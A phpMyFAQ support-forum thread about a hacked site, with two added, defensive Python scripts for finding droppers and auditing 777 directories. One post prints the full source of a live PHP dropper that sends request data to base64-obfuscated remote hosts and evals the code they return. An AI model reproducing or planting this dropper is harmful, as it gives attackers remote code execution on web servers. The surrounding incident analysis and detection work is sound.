phpmyfaq being hacked via inc directory
Moderator: Thorsten

Hello.
I found a couple of pages created in the inc directory that have me confused.
tummytemple.com/faq/inc/jennifer-lopez-video-dawnload.html
http://tummytemple.com/faq/inc/Bc+Highway+Cams.html
I went into the directory via an FTP program and do not see these HTML files.
Any thoughts as to how this is happening and how come I can't see the HTML files?
Thanks to anyone that can help.
Tim
Hi,
Which version do you use?
bye
Thorsten
phpMyFAQ Maintainer and Lead Developer
amazon.de Wishlist
- Posts: 7
- Joined: Wed Nov 23, 2005 9:00 pm
check this out
If you would like to see even more compromises to our server via phpMyFAQ, check out the following URL:
http://www.google.com/search?hl=en&lr=& ... tnG=Search
This does a search on our server for the word "Jennifer". I can only imagine how many other pages are created.
Any help here is truly appreciated.
Thanks!
some odd php files worth looking into
I found the following PHP files and thought they looked odd:
1) in the inc directory - 44658.php
2) in the data directory - 161182.php
The code for 44658.php is:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);if((include(base64_decode("aHR0cDovLw==").base64_decode("YS5waHB0YWdzLndz")."/?".$str)));else if(include(base64_decode("aHR0cDovLw==").base64_decode("Yi5waHB0YWdzLndz")."/?".$str));else if($c=file_get_contents(base64_decode("aHR0cDovLzcucGhwdGFncy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLnBocHRhZ3Mud3MvPw==").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>
I changed the name of the php file and the pages listed on google went dead. These php files are definitely the culprit.
I followed a lead to an IP address that shows that they create the PHP files for website owners to generate traffic and revenue. They had a link to report abuse. I filled it out but don't expect much.
I'm just concerned that there is clearly a security breach via phpMyFAQ that others might be searching for via bots, hacking and using.
Thanks for any thoughts/help.
Tim
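The dropper Tim posted has a recognisable shape: it silences errors, packs request data into a base64 string, and then hands control to whatever a remote host returns through include(), file_get_contents() plus eval(), or cURL. The Python triage script below is an added example, not code from phpMyFAQ or from this thread. It scans a tree of .php files for that combination of indicators and decodes the base64 literals so the contacted hostnames can be read off and blocked or reported. The sample file it writes is a constructed, defanged stand-in for 44658.php with a placeholder hostname (c2.example.invalid), not the real encoded strings from the post.

```python
"""Triage scan for remote-include droppers of the kind posted in this thread.

Added example, not code from phpMyFAQ or from the poster.  The sample
file it writes is a constructed, defanged stand-in for 44658.php: it keeps
the shape (error_reporting(0), base64 literals feeding include()/eval(),
a numeric filename) but the encoded hostname is a placeholder.
"""
import base64
import re
import tempfile
from pathlib import Path


def b64(text):
    return base64.b64encode(text.encode()).decode()


FAKE_HOST = "c2.example.invalid"  # placeholder; not the host from the thread

# Constructed sample with the same structure as the posted dropper.
SAMPLE_DROPPER = (
    '<? error_reporting(0);'
    '$str=base64_encode($_SERVER["HTTP_HOST"]).".".base64_encode($_SERVER["REQUEST_URI"]);'
    'if(include(base64_decode("' + b64("http://") + '").base64_decode("' + b64(FAKE_HOST) + '")."/?".$str));'
    'else if($c=file_get_contents(base64_decode("' + b64("http://" + FAKE_HOST + "/?") + '").$str))eval($c); ?>'
)

# Constructed benign file: uses base64_decode() but executes nothing remote.
BENIGN_PAGE = '<?php\necho base64_decode("' + b64("Hello") + '");\n'

# Indicators drawn from the posted sample.
INDICATORS = {
    "silenced_errors": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "remote_execution": re.compile(
        r"\b(?:eval|include|include_once|require|require_once|file_get_contents|curl_init)\s*\("),
}
B64_LITERAL = re.compile(r'base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
NUMERIC_NAME = re.compile(r"^\d+\.php$")


def decode_literals(source):
    """Decode every base64 string literal passed to base64_decode()."""
    decoded = []
    for literal in B64_LITERAL.findall(source):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            decoded.append("<undecodable:" + literal + ">")
    return decoded


def assess(path, source):
    """Return the indicators a file trips and the strings its base64 literals hide."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(source))
    if NUMERIC_NAME.match(Path(path).name):
        hits.append("numeric_filename")
    # base64 on its own is common in clean code; require it to feed an
    # execution primitive and to come with one more tell-tale.
    suspicious = (
        "base64_decode" in hits
        and "remote_execution" in hits
        and ("silenced_errors" in hits or "numeric_filename" in hits)
    )
    return {"path": str(path), "indicators": hits,
            "decoded": decode_literals(source), "suspicious": suspicious}


def scan_tree(root):
    return [assess(p, p.read_text(errors="replace")) for p in sorted(Path(root).rglob("*.php"))]


def demo():
    """Write the constructed files into a temp dir and scan it; keyed by file name."""
    root = Path(tempfile.mkdtemp(prefix="faq-triage-"))
    (root / "inc").mkdir()
    (root / "inc" / "44658.php").write_text(SAMPLE_DROPPER)
    (root / "index.php").write_text(BENIGN_PAGE)
    return {Path(f["path"]).name: f for f in scan_tree(root)}


if __name__ == "__main__":
    for name, finding in demo().items():
        flag = "SUSPICIOUS" if finding["suspicious"] else "ok"
        print(name, flag, finding["indicators"], finding["decoded"])
```

Run scan_tree() against a copy of the web root rather than the live tree. Anything flagged is worth reading by hand, and the decoded strings give you the hosts to block at the egress proxy and to name in an abuse report. A clean file can legitimately call base64_decode(), which is why the verdict requires it to feed an execution primitive and to come with a second tell-tale rather than any one indicator alone.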
The site providing the PHP code is 66.226.75.10
Just a heads up!
Permissions are definitely a part of the problem
I took a look more deeply into the directories. What I saw was that the php files were uploaded all at the same time on the same day.
I searched for other directories that showed "last modified" on the same date and times and found more of these numeric (e.g. 234324.php) files. Clearly these folks did not stay in alignment with your great PHP descriptions. So it made it easy to pick them out and neutralize them.
All of the places they were located were in directories with 777 permissions. I changed them all to 775 to eliminate the ability for public write permissions. I hope this offers better protection on my end.
The only thing I don't know is whether phpMyFAQ will work with those folders on 775 vs. 777. And, if this is the case, did I miss something in the installation guidelines to secure the folders?
Again, thoughts and guidance appreciated.
Tim
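Tim's last post describes two checks he did by hand: comparing "last modified" timestamps to find the batch of numeric-named files dropped together, and tightening 777 directories to 775. The Python script below is an added example (not phpMyFAQ code and not from the thread) that automates both over a directory tree: it lists world-writable directories, plans or applies clearing the other-write bit, and clusters .php files by modification time so a burst of same-minute writes with numeric names stands out. The directory layout and timestamps it builds under a temp dir are constructed for the demonstration.

```python
"""Audit helper for the checks described in the thread's last post:
world-writable (777) directories and a burst of PHP files dropped at the
same moment.  Added example, not code from phpMyFAQ or from the poster;
the directory tree it builds is constructed for the demonstration.
"""
import os
import re
import stat
import tempfile
import time
from pathlib import Path

NUMERIC_PHP = re.compile(r"^\d+\.php$")


def world_writable_dirs(root):
    """Directories whose mode grants write to 'other' (777, 757, ...)."""
    root = Path(root)
    return sorted(
        str(p.relative_to(root))
        for p in [root, *root.rglob("*")]
        if p.is_dir() and p.stat().st_mode & stat.S_IWOTH
    )


def harden(root, dry_run=True):
    """Clear the other-write bit (777 -> 775) on every directory that has it.
    Returns (relative path, old mode, new mode) tuples; with dry_run it only plans."""
    changes = []
    for rel in world_writable_dirs(root):
        p = Path(root) / rel
        old = stat.S_IMODE(p.stat().st_mode)
        new = old & ~stat.S_IWOTH
        changes.append((rel, oct(old), oct(new)))
        if not dry_run:
            p.chmod(new)
    return changes


def mtime_clusters(root, window=60):
    """Group .php files whose mtimes fall within `window` seconds of the
    first file in the group, after sorting by mtime."""
    files = sorted(Path(root).rglob("*.php"), key=lambda p: p.stat().st_mtime)
    clusters, current, start = [], [], None
    for p in files:
        mtime = p.stat().st_mtime
        if start is None or mtime - start > window:
            if current:
                clusters.append(current)
            current, start = [], mtime
        current.append(p)
    if current:
        clusters.append(current)
    return clusters


def suspicious_clusters(root, window=60, min_size=2):
    """Clusters of at least `min_size` files that include numeric-named PHP
    files: the pattern the poster picked out by hand from 'last modified'."""
    out = []
    for cluster in mtime_clusters(root, window):
        numeric = sorted(str(p.relative_to(root)) for p in cluster if NUMERIC_PHP.match(p.name))
        if len(cluster) >= min_size and numeric:
            out.append({"size": len(cluster), "numeric": numeric})
    return out


def demo():
    """Build a constructed tree: a day-old install plus a batch of numeric
    droppers written within one minute into 777 directories."""
    root = Path(tempfile.mkdtemp(prefix="faq-audit-"))
    for name, mode in (("inc", 0o777), ("data", 0o777), ("attachments", 0o755)):
        (root / name).mkdir()
        (root / name).chmod(mode)
    install = time.time() - 86400
    dropped = time.time() - 3600
    timestamps = {
        "inc/functions.php": install, "index.php": install + 5,
        "inc/44658.php": dropped, "data/161182.php": dropped + 12,
        "attachments/234324.php": dropped + 40,
    }
    for rel, ts in timestamps.items():
        path = root / rel
        path.write_text("<?php // constructed placeholder\n")
        os.utime(path, (ts, ts))
    return {
        "root": str(root),
        "world_writable": world_writable_dirs(root),
        "plan": harden(root, dry_run=True),
        "clusters": suspicious_clusters(root),
    }


if __name__ == "__main__":
    result = demo()
    print("world-writable:", result["world_writable"])
    print("planned chmod:", result["plan"])
    print("suspicious clusters:", result["clusters"])
```

The open question in the thread, whether phpMyFAQ still works on 775, is a matter of who the PHP process runs as: 775 keeps the directory writable by its owner and group, so the application keeps working as long as the web server user is the owner or in the group. Check that with ls -l on the host before running harden() with dry_run=False, and keep the dry-run output as a record of what was changed.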